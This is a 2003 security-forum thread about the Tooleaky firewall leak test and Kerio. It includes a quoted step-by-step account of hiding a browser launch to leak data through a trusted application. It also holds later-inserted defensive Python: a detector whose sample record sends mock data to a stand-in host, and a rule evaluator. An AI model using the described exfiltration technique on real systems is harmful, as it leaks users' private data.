Kerio and tooleaky?
notageek
April 9th, 2003, 05:32 PM
I tried Tooleaky and it ran right through Kerio and said my firewall (Kerio) is useless. If this is the case how do I fix it?
CrazyM
April 9th, 2003, 06:29 PM
Quoting notageek: "I tried Tooleaky and it ran right through Kerio and said my firewall (Kerio) is useless. If this is the case how do I fix it?"
The current release version of Kerio (v2.14) does not handle this type of program hijacking or .dll injection.
One related post I found from the Kerio forum at DSLR:
http://www.dslreports.com/forum/remark,2823724~root=kerio~mode=flat
The v3.0x betas introduced measures to deal with this kind of potential vulnerability, but development stopped. Kerio is currently working on a new v3.5 which may be out shortly for beta testing. I would suspect it will also have measures to deal with this sort of thing.
For those not familiar with tooleaky:
http://tooleaky.zensoft.com/
Regards,
CrazyM
JacK
April 9th, 2003, 06:48 PM
Quoting notageek: "I tried Tooleaky and it ran right through Kerio and said my firewall (Kerio) is useless. If this is the case how do I fix it?"
Hello,
You might run System Safety Monitor in conjunction with your FW and pass all leaktests with flying colours.
Rgds,
LowWaterMark
April 9th, 2003, 07:20 PM
The beauty of "tooleaky" was not in its coding, but in the idea itself and its simplicity! If you look at the source code, there's really nothing to it, and yet, it can get by an awful lot of software firewalls. Or at least it could, until they started adding a lot of additional complex features to prevent this type of "exploit". Obviously, they never updated the old version of Kerio against this exploit, but most software firewalls have already or are addressing this and other exploit methods in their newer versions.
The tooleaky concept depends entirely upon a piece of malware (tooleaky.exe in this case) being able to run a program that has been granted access out to the Internet through the firewall without the user knowing.
You can defeat this type of exploit by not allowing any programs access out through the firewall without the user having to specifically allow them each time a new instance starts up. Well, that setup would defeat the simple tooleaky design, but, not the next thing someone thought up...
Next they started having the malware program itself try to kill the software firewalls, or in some cases, have it "press" the confirmation buttons on the firewall alert pop-ups itself. And so went the attack mechanisms, and now the software firewall companies have to have protections from being killed from within the computer in them, protections against programs being able to click their buttons, and so on.
There is of course one simple protection to all these types of exploits. They all require the user to download and execute a program. Safe computing habits make a formidable initial line of defense.
After that, having the latest version of your software firewall, with all these special extra protections is what's needed, along side a safe configuration, of course.
LowWaterMark
April 9th, 2003, 07:38 PM
Quoting JacK: "You might run System Safety Monitor in conjunction with your FW and pass all leaktests with flying colours."
Yes, tools like SSM and Tiny Trojan Trap are the best defenses against these various exploits because they monitor and control the behavior of programs, and how they interact with the OS and each other.
Many software firewall vendors are simply trying to build ever higher walls and other layers of defense around themselves. But, I think with every defense they add, the other side will just find a way to circumvent that. It'll go back and forth forever. :-\
For anyone interested, here is what "tooleaky" itself does:
Quote:
1. tooleaky checks for the exact location of your PC's Internet Explorer executable by reading this registry key:
HKLM\Software\Classes\Applications\iexplore.exe\shell\open\command
If you have IE installed, this will tell tooleaky exactly where the program is so that it can build a command string to execute it. Note that real malware could look for and run any program, not just IE.
2. It builds a command string to run IE, targeting a specific URL (a webpage at GRC), and to that it adds some simulated "secret data" from your system. (Actually, it's just a hard coded string: "PersonalInfoGoesHere" - nothing real, but it could have been personal data it read off your hard drive.)
3. tooleaky now calls a Windows function to execute the IE command it has built in a hidden window.
Windows allows for hidden windows to execute - i.e. ones that show nothing on the taskbar. In this window, Internet Explorer runs with the purpose of browsing that specific GRC page...
4. It then simply waits for the hidden window to open and to contact the webpage. (tooleaky "loops" here in the code, scanning constantly for the IE window.)
5. If it doesn't find the window in 30 seconds, you pass the tooleaky test and it tells you so. If it finds that window, you fail the test and it tells you your system is not secure.
6. It closes the hidden IE window it made above, and the program exits.
That's all there is to it. It's a very simple attack considering how complex it is for the software firewall applications to defend against it.
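The six steps above are a "borrowed trust" pattern: an untrusted process starts a browser that already has outbound permission, and the data rides out in the URL's query string. As an added example (my code, not the thread's or the tooleaky author's), here is a small Python check run over constructed Sysmon-style process-creation records that flags a browser started by an unexpected parent with data in its URL. The field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample events, file paths, the EXPECTED_PARENTS allow-list and the example.invalid URL are constructed or assumed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Browser executables whose outbound permission a hijacker would borrow.
BROWSERS = {"iexplore.exe", "opera.exe", "firefox.exe"}

# Parents that normally start a browser on the user's behalf. Any other parent
# starting a browser with a URL on its command line deserves a look.
# (Assumption: this allow-list must be tuned per environment.)
EXPECTED_PARENTS = {"explorer.exe", "userinit.exe"}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def analyze(event: dict) -> list:
    """Return the reasons a process-creation event looks like browser hijacking.

    An empty list means the event is not interesting to this check."""
    if basename(event["Image"]) not in BROWSERS:
        return []
    match = URL_RE.search(event["CommandLine"])
    if match is None:
        return []  # browser started without a URL: an ordinary launch
    reasons = []
    parent = basename(event["ParentImage"])
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"browser launched by unexpected parent {parent}")
    query = parse_qs(urlsplit(match.group(0)).query)
    if query:
        reasons.append("URL carries query-string data in field(s): "
                       + ", ".join(sorted(query)))
    return reasons


def scan(events: list) -> dict:
    """Map the index of every flagged event to its list of reasons."""
    flagged = {}
    for index, event in enumerate(events):
        reasons = analyze(event)
        if reasons:
            flagged[index] = reasons
    return flagged


# Constructed records in the shape of Sysmon Event ID 1; not real log data.
SAMPLE_EVENTS = [
    {   # the user opens IE from the shell: nothing to see
        "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"',
    },
    {   # the tooleaky pattern: an unknown download starts IE with data in the URL
        "Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
        "ParentImage": r"C:\Users\demo\Downloads\tooleaky.exe",
        "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe" '
                       "http://example.invalid/leak?d=PersonalInfoGoesHere",
    },
    {   # the user clicks a plain link: expected parent, no query string
        "Image": r"C:\Program Files\Opera\opera.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Opera\opera.exe" http://example.invalid/',
    },
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS).items():
        print(f"event {index}: " + "; ".join(reasons))
```

Treat this as a hunting query rather than a blocking rule: mail clients, chat programs and document viewers legitimately start browsers with URLs, so the parent allow-list needs tuning before the "unexpected parent" reason means much. Process-creation logs also cannot see the hidden-window trick from step 3; the check catches the launch, not the window.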
notageek
April 9th, 2003, 07:55 PM
I switched to Kerio from Sygate cuz you're able to make a loopback rule. I didn't want programs piggybacking on Proxo. But now I see Kerio can't block this type of stuff. I wonder if McAfee Firewall 4.0 will block piggybacks and tooleaky. :) Bloat up my computer to be safe. LOL ;) I tried SSM and it gave me an error message. It doesn't work well with XP. I also tried LookNStop and it said something about a drive not installed. I don't know what that means but you know. Maybe I'll go back to Sygate and pray nothing piggybacks Proxo while I'm online until they come up with a fix for it. :) Thanks guys for the help.
JacK
April 10th, 2003, 04:37 AM
Quoting notageek:
--cut--
I tried SSM and it gave me an error message. It doesn't work well with XP.
--cut--
Hello,
SSM is at its best with WinXP ;)
Don't hesitate to contact Max (bugsbunnyATe-mail.ru) if you encounter any problems.
Rgds,
notageek
April 10th, 2003, 11:27 AM
I'll try it again. It could have been a bad install or a bad download. Thanks Jack.
deadmanschest
April 10th, 2003, 07:57 PM
Quoting notageek: "I tried Tooleaky and it ran right through Kerio and said my firewall (Kerio) is useless. If this is the case how do I fix it?"
Hi notageek - I use Kerio 2.13 and Proxo, and have always beaten tooleaky, leaktest and firehole, even when I used IE...
Do you mean that you do not get an alert that Leaktest wants access out, or that it gets out 'secretly'?
I have three simple rules that stop them all. I allow Opera/Phoenix access to Proxo thru localhost:8080; I disallow any other apps any access to Proxo at all; and I allow Proxo full access out to any remote address.
When I run Leaktest or Firehole, Opera opens up and connects to my homepage, then I get an alert that 'Firewall Leak Test Utility wants to connect to GRC' and I deny it....that's it...
Now, if you want it to be denied without any alert at all, then as I understand it you need the 'application blah blah filtering' that is supposed to be coming in the newer versions...
Now I may be wrong, I'm a novice and no one ever believes that I have always foiled leaktest, tooleaky and firehole, but it's always worked for me. I think Tooleaky is hard wired to use IE, as it never even opens a connection on my machine, as far as I know...haha...
Good luck
dmc
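dmc's three rules work because they are keyed on the requesting application and evaluated in order. As an added example (my code, not dmc's configuration or Kerio's rule format), here is a toy first-match rule evaluator in Python that encodes those three rules and shows what each kind of connection gets, including a hijacked IE trying to reach the proxy. The executable names (opera.exe, phoenix.exe, proxomitron.exe, leaktest.exe), the loopback address and the remote address are assumptions or constructed values.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import FrozenSet, Optional


@dataclass(frozen=True)
class Rule:
    apps: Optional[FrozenSet[str]]  # None matches any application
    dst_net: str                    # destination network, CIDR notation
    dst_port: Optional[int]         # None matches any port
    action: str                     # "allow", "deny" or "ask"


@dataclass(frozen=True)
class Conn:
    app: str        # executable making the outbound request (assumed names)
    dst_ip: str
    dst_port: int


# dmc's three rules, in the order they must be evaluated.
RULES = [
    # 1. the browsers may reach Proxomitron on localhost:8080
    Rule(frozenset({"opera.exe", "phoenix.exe"}), "127.0.0.0/8", 8080, "allow"),
    # 2. nothing else may talk to Proxomitron at all
    Rule(None, "127.0.0.0/8", 8080, "deny"),
    # 3. Proxomitron itself may go anywhere
    Rule(frozenset({"proxomitron.exe"}), "0.0.0.0/0", None, "allow"),
]

# Anything no rule matches falls through to a prompt, which is the alert
# dmc describes when Leaktest tries to reach GRC directly.
DEFAULT_ACTION = "ask"


def evaluate(conn: Conn, rules=RULES) -> str:
    """First-match evaluation: the action of the first rule matching conn."""
    for rule in rules:
        if rule.apps is not None and conn.app.lower() not in rule.apps:
            continue
        if ip_address(conn.dst_ip) not in ip_network(rule.dst_net):
            continue
        if rule.dst_port is not None and rule.dst_port != conn.dst_port:
            continue
        return rule.action
    return DEFAULT_ACTION


# Constructed connection attempts (198.51.100.10 is a documentation address).
SCENARIOS = {
    "Opera via the proxy": Conn("opera.exe", "127.0.0.1", 8080),
    "hijacked IE via the proxy": Conn("iexplore.exe", "127.0.0.1", 8080),
    "Proxomitron to a remote site": Conn("proxomitron.exe", "198.51.100.10", 80),
    "Leaktest direct to remote": Conn("leaktest.exe", "198.51.100.10", 80),
}

if __name__ == "__main__":
    for label, conn in SCENARIOS.items():
        print(f"{label}: {evaluate(conn)}")
    # Rule order matters: with the blanket deny first, even Opera is cut off.
    reordered = [RULES[1], RULES[0], RULES[2]]
    print("Opera with the deny rule first:",
          evaluate(SCENARIOS["Opera via the proxy"], reordered))
```

The reordering at the end is the point worth carrying back to a real firewall: the blanket "deny everything else to the proxy" rule only works because the browser allow rule sits above it, and the unmatched Leaktest attempt reaches the prompt only because no broad allow rule sits below.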
notageek
April 10th, 2003, 08:22 PM
Tooleaky sneaks out without me knowing it. Kerio has a slight learning curve. Maybe the new Kerio (whenever it comes out) might be a little better. But right now I'm waiting for the new Sygate or Outpost. I'm going to jump on the first one that comes out.
spy1
April 11th, 2003, 10:06 AM
For those of you using SSM - Does it automatically work on all user profiles in WinXP Pro? Or does it have to be configured to do so?
I don't want to install it and then have the other users playing with it while I'm trying to learn what to do with it. Thanks. Pete
root
April 11th, 2003, 12:18 PM
I haven't used it on XP, but it has a user mode, and can be password protected.
It's a small free program, so I think there is minimal risk in installing it and checking it out.
FWIW Pete, SSM is a must have in my security line up. If I had to choose between SSM and an AT, I would take SSM.
The best thing about it is that there are several exploits, aka leak tests, that have not even been discovered or publicized yet, and while firewall vendors will have to react to block them, SSM is already able to.
notageek
April 11th, 2003, 12:27 PM
What's the difference between SSM and Abtrusion Protector? Does it use fewer resources than Abtrusion Protector?
SpaceCowboy
April 11th, 2003, 12:38 PM
Quoting spy1: "For those of you using SSM - Does it automatically work on all user profiles in WinXP Pro? Or does it have to be configured to do so? I don't want to install it and then have the other users playing with it while I'm trying to learn what to do with it. Thanks. Pete"
SSM protects all users, but only the user that logs on at bootup will get the prompts for new applications. So another user that tries to install a new application will have no idea why they can't, because the prompt will be on the original user's screen.
spy1
April 11th, 2003, 12:48 PM
Thank you, root and SC. I'm liking the sound of it more and more. Pete
JacK
April 11th, 2003, 12:52 PM
Quoting notageek: "What's the difference between SSM and Abtrusion Protector? Does it use fewer resources than Abtrusion Protector?"
Hello,
SSM uses about 6 MB of RAM on my system (WinXP Pro); I don't remember how much for AP.
SSM is compatible with non-NT OSes; AP is not.
The biggest issue with AP is that you must be ABSOLUTELY sure your OS is clean: when installing, it scans all exe and dll files and everything is considered trusted by default, including any malware already installed.
Rgds,
notageek
April 11th, 2003, 01:10 PM
Thanks Jack.
vBulletin® Copyright ©2000-2012, Jelsoft Enterprises Ltd.
Copyright ©2002 - 2012, Wilders Security Forums